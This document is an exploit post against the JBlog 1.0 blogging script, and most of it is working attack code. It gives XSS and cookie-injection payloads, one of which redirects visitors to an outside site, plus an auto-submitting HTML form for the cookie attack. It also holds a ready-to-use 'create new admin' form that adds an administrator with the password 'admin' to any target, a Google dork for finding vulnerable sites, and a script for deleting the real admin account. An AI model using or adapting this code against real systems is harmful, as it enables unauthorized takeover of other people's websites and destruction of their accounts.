<!-- ############################################################################## # Script...............: JBlog version: 1.0 # # Script Site..........: http://www.jmuller.net/jblog # # Vulnerability........: Creat Admin exploit, xss, Cookie Manipulation # # Access...............: Remote # # level................: Dangerous # # Author...............: S4mi # # Contact..............: S4mi[at]LinuxMail.org # # # ############################################################################## cookies Manipulation + Cross Site Scripting : ========================================================================= xss: ---- http://site.com/jblog/index.php?id=">[xss Here]&pcomm=com cookies Manipulation: -------------------- The POST variable 'search' in /jblog/recherche.php also The Cookie variable 'theme' is affected and can be set to : <meta http-equiv='Set-cookie' content='name=value'> also we can do this : <meta http-equiv='Set-cookie' content='theme=<body+onload=alert("owned_by_Hacker")>'> or : <meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://Bad.site.com/">'> This is a small exemple of Inject Cookie Xploit (Cookie Manipulation) --------------------------------------------------------------------------- <html> <head> <title>Inject Cookie Xploit By S4mi</title> </head> <body> <script language="JavaScript"> function JBlogxpl() { document.xploit.action=document.xploit.victim.value; document.xploit.submit(); } </script> <form name="xploit" method="post" action=""> <input type="hidden" name="victim" value="http://victim/jblog/recherche.php"> <input type="hidden" name="search" value="<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://milw0rm.com/">'>" /> <script>document.location="javascript: JBlogxpl()"</script> </form> </body> </html> ============================================================================ Remote Privilege Escalation "Creat New Admin Xploit" By S4mi : ============================================================================ --> <html> <title>JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi</title> <body> <script language="JavaScript"> function JBlogxpl() { if (document.xploit.victim.value=="") { alert("Please enter target!"); return false; } { xploit.action="http://"+document.xploit.victim.value+"admin/ajoutaut.php"; xploit.mot.value=document.xploit.mot.value; xploit.droit.value=document.xploit.droit.value; xploit.submit(); } } </script> <strong><p> -------------------------------------------------------------------------------------------<br> #JBlog 1.0 -- Remote Privilege Escalation Xploit (add user)<br> # Discovered By...............: S4mi <br> # Contact..........................: S4mi[at]LinuxMail.org<br> #<br> # Google Dork : "propulsé par JBlog" <br> --------------------------------------------------------------------------------------------</p> <form name="xploit" method="POST" onSubmit="JBlogxpl();"> Target -> Http:// <input type="text" name="victim" value="www.Site.com/Path/" size="44"> <p> Username.......-> <input type="text" name="mot" value="ZaZ" size="30"> (your password will be by default: <i>"admin"</i>)</p> <p> User type......-> <select name="droit"> <option value="3">Admin</option> <option value="2">Moderator</option> <option value="1">Editor</option> </select> </p> <p>Submit...........-> <input name="submit" type="submit" value=" Xploit it "> </p> </form> <br>---------------------------------------------------------------------------------------<br> #NB : Remember do not use a probably existing username (such as "admin"). <br> #If you want to Delete real admin account :D login into your New Created admin account & use this :<br> --------------------------------------------------------------------------------------------<p> <script language="JavaScript"> function AdminDelete() { if (document.xploit.victim.value=="") { alert("Please enter target!"); return false; } if(confirm('Are you Sure!! want really DELETE user ?')) document.location.href="http://"+document.xploit.victim.value+"admin/supauteur.php?cat="+document.userdel.id.value; } </script> <form name="userdel" method="POST" onSubmit=""> ID...............> <input type="text" name="id" value="1" size="3"> </form> <a href="#" OnClick="AdminDelete()"/>Delete</a> <br>-----------------------------------------------------------------------------------------------<br> #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39, Black-Code, Nuck3r... & all who know Me! </body> </html>